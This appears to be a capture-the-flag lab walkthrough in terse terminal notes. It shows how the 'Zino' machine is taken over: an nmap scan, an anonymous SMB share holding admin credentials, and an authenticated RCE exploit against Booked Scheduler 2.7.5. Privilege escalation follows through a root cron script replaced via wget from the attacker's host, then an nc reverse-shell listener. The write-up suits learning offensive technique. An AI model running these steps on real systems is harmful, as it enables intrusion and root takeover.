$ sudo nmap -sCV -p- -v -Pn --open 192.168.227.64 > Zino.txt
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 3.0.3
22/tcp   open  ssh         OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 b2:66:75:50:1b:18:f5:e9:9f:db:2c:d4:e3:95:7a:44 (RSA)
|   256 91:2d:26:f1:ba:af:d1:8b:69:8f:81:4a:32:af:9c:77 (ECDSA)
|_  256 ec:6f:df:8b:ce:19:13:8a:52:57:3e:72:a3:14:6f:40 (ED25519)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)
3306/tcp open  mysql       MariaDB 10.3.24 or later (unauthorized)
8003/tcp open  http        Apache httpd 2.4.38
| http-methods: 
|_  Supported Methods: OPTIONS HEAD GET POST
|_http-title: Index of /
| http-ls: Volume /
| SIZE  TIME              FILENAME
| -     2019-02-05 21:02  booked/
|_
|_http-server-header: Apache/2.4.38 (Debian)
Service Info: Hosts: ZINO, 127.0.1.1; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 1h20m00s, deviation: 2h18m34s, median: 0s
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-time: 
|   date: 2026-07-11T01:45:29
|_  start_date: N/A
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.9.5-Debian)
|   Computer name: zino
|   NetBIOS computer name: ZINO\x00
|   Domain name: \x00
|   FQDN: zino
|_  System time: 2026-07-10T21:45:26-04:00
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required

$ smbclient //192.168.227.64/zino -N
smb: \> ls
  .                                   D        0  Fri Jul 10 03:11:49 2020
  ..                                  D        0  Tue Apr 28 21:38:53 2020
  .bash_history                       H        0  Tue Apr 28 23:35:28 2020
  error.log                           N      265  Tue Apr 28 22:07:32 2020
  .bash_logout                        H      220  Tue Apr 28 21:38:53 2020
  local.txt                           N       33  Sat Jul 11 09:42:49 2026
  .bashrc                             H     3526  Tue Apr 28 21:38:53 2020
  .gnupg                             DH        0  Tue Apr 28 22:17:02 2020
  .profile                            H      807  Tue Apr 28 21:38:53 2020
  misc.log                            N      424  Tue Apr 28 22:08:15 2020
  auth.log                            N      368  Tue Apr 28 22:07:54 2020
  access.log                          N     5464  Tue Apr 28 22:07:09 2020
  ftp                                 D        0  Tue Apr 28 22:12:56 2020

# Check these files, http://192.168.227.64:8003/booked/Web/dashboard.php?
admin:adminadmin
User peter
login to http://192.168.227.64:8003/booked/Web/dashboard.php with admin:adminadmin
© 2019 Twinkle Toes Software
Booked Scheduler v2.7.5

# https://www.exploit-db.com/exploits/46486
$ searchsploit booked scheduler -o
Booked Scheduler 2.7.5 - Remote Command Execution (RCE) (Authenticated) | php/webapps/50594.py

$ python3 50594.py http://192.168.227.64:8003 admin adminadmin 
[+] Logged in successfully.
[+] Uploaded shell successfully
[+] http://192.168.227.64:8003/booked/Web/custom-favicon.php?cmd=

$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

# Get a better shell by upload sh8003.php, need to set httpserver on Kali port 139 

Linux zino 4.19.0-8-amd64 #1 SMP Debian 4.19.98-1 (2020-01-26) x86_64 GNU/Linux

*/3 *   * * *   root    python /var/www/html/booked/cleanup.py

wget http://192.168.45.152:139/cleanup.py

$ rlwrap nc -nlvp 445 
listening on [any] 445 ...
connect to [192.168.45.152] from (UNKNOWN) [192.168.227.64] 51262
# id
id
uid=0(root) gid=0(root) groups=0(root)
